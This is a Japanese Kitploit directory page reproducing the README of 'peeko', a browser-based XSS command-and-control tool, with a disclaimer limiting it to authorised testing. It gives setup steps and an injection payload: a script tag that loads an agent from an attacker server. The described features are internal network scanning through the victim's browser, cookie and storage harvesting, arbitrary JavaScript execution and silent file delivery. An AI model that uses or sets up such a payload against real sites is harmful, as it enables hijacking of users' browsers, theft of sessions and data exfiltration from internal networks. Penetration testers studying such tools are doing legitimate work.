Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
peeko — peeko – 感染したブラウザを介したステルスな内部ネットワーク探索のためのブラウザベースのXSS C2。 | Kitploit
ツール/GitHubGitHub/b3rito/peeko
偵察ネットワークマッピングポートスキャン横移動ウェブアプリケーション悪用データ流出情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロール
GitHubb3rito/peeko

peeko

2302861年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

peeko – 感染したブラウザを介したステルスな内部ネットワーク探索のためのブラウザベースのXSS C2。

リポジトリを見る

peeko

バージョン: v1.1

peeko は、被害者のブラウザを内部ネットワーク内のステルスプロキシとして利用する、ブラウザベースの XSS を利用した C2(コマンドアンドコントロール)ツールです。

注入された XSS ペイロードを通じて、peeko は中央サーバーへの WebSocket 接続を確立し、攻撃者は被害者のブラウザをリモートで制御して、内部サービスへのリクエスト送信、ネットワークスキャン、データの外部送信、さらには任意の JavaScript の実行まで可能になります。バイナリを1つも配置することなく、すべてを実現します。


特徴

  • 攻撃者と被害者の間の WebSocket ベースの通信
  • 被害者のブラウザが内部 URL を取得し、IP 範囲とポートをスキャン
  • シンプルなコントロールパネル:
    • 被害者の選択
    • 手動 URL フェッチ
    • IP とポート範囲のスキャナー
    • カスタム JS 実行(手動または自動)
    • ファイル配信(自動/手動)
    • ブラウザ情報とトークンの収集(Cookie、ストレージなど)
    • コピーおよび .txt または .json として保存が可能なログビューア
  • 自己署名証明書による HTTPS サポート
  • 軽量: 単一の Python ファイル + 静的アセット

必要条件

  • Python 3.8+
  • OpenSSL
  • Linux/macOS(Debian ベースのシステムでテスト済み)

クイックスタート

  1. リポジトリをクローン:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. 依存関係をインストール:

    root@kitploit:~
    make install
    
  3. (任意)スクリプトを実行可能にする:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. 自己署名 TLS 証明書を生成:

    root@kitploit:~
    make cert
    
  5. SERVER-IP プレースホルダーを置き換える:

    以下のファイルを開いて編集します:

    • static/agent.js
    • static/control.html

    SERVER-IP をサーバーの IP/ドメインに置き換えます:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. サーバーを起動:

    root@kitploit:~
    make run
    
  7. ブラウザでコントロールパネルを開く:

    root@kitploit:~
    https://192.168.30.136:8443/static/control.html
    
  8. エージェントを注入(XSS の例):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    

コントロールパネルの機能

コア機能

  • 接続中の被害者の選択と管理
  • 被害者経由で任意の内部/外部 HTTPS URL をフェッチ
  • LAN 範囲のスキャン: 192.168.1.0/24、10.0.0.10-20 など
  • 特定のポートまたは範囲のスキャン(例: 80、443,8000-8080)

ファイル配信

  • 被害者へのファイル送信(WebSocket 経由の Base64)
  • 被害者のブラウザが自動的にダウンロード
  • 接続時の自動アップロードに対応

情報収集

  • User Agent、プラットフォーム、リファラー、Cookie、local/sessionStorage を収集
  • 結果を JSON で表示
  • 手動または接続時に自動収集

カスタム JS 実行

  • 被害者のブラウザで任意の JavaScript を実行
  • 送信には exec:... 形式を使用
  • 接続時の 自動実行 に対応
  • 例: exec:alert(document.cookie);

ロギング

  • すべてがログに記録されます(リクエスト、レスポンス、情報ダンプ)
  • ログを .txt または .json としてコピーまたはエクスポート
  • ターミナルログのようにデザインされたミニマルな UI

CORS と Mixed Content の解説

最新のブラウザポリシーは、peeko がアクセスできる内容に影響を与えます。

CORS レスポンス

ヘッダーコンテンツを読み取れるか?備考
Access-Control-Allow-Origin: *✅レスポンスへのフルアクセス
ヘッダーなし⚠️レスポンスは不透明(opaque)
制限されたオリジン❌ブロックされるか読み取り不可

Mixed Content

被害者は HTTPS 経由で接続します。スキャン対象が HTTP のみを使用している場合:

  • ブラウザは Mixed Content リクエストをブロックします
  • peeko は http:// エンドポイントから読み取ることができません
  • スキャン時は常に HTTPS を使用するターゲットを優先してください

実際の運用

ペネトレーションテスト中に、Access-Control-Allow-Origin: * で応答し、HTTPS で提供される内部サービスを見つけた場合、peeko はステルスプロキシとなり、ファイルを配置したり、外部への接続を開いたりすることなく、被害者のブラウザから直接内部データを外部送信できます。


プロジェクト構造

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket サーバー
├── start.sh            → サーバーの起動
├── gen-cert.sh         → 自己署名 TLS 証明書の生成
├── Makefile            → インストール/実行ヘルパー
├── requirements.txt    → Python 依存関係
├── certs/              → TLS キーと証明書がここに保存されます
└── static/             → ブラウザクライアントアセット
    ├── control.html    → コントロールパネル(旧 attacker.html)
    ├── infect.html     → 被害者ランディングページ
    └── agent.js        → 被害者エージェントスクリプト

ワークフロー

  1. 攻撃者が XSS を注入(格納型または反射型の脆弱性経由)
  2. 被害者のブラウザが WebSocket 経由で peeko サーバーに接続
  3. コントロールパネルで攻撃者が可能なこと:
    • ネットワークのスキャン
    • URL のフェッチ
    • Cookie、ストレージのダンプ
    • 任意の JS の実行
    • レスポンスの外部送信
    • ファイルの配布

ユースケース

  • XSS による内部ネットワークマッピング
  • ブラウザベースのピボット
  • サイレントなファイル配信 / JS ドロッパー

免責事項

このツールは、教育および許可されたテスト目的でのみ提供されます。
明示的な許可がある環境以外での peeko の使用は、固く禁止されています。
あなた自身の行動に対する責任はあなたにあります。


著作者

b3rito(mes3hacklab)および GioPpeTto によって作成されました。

ツールをダウンロード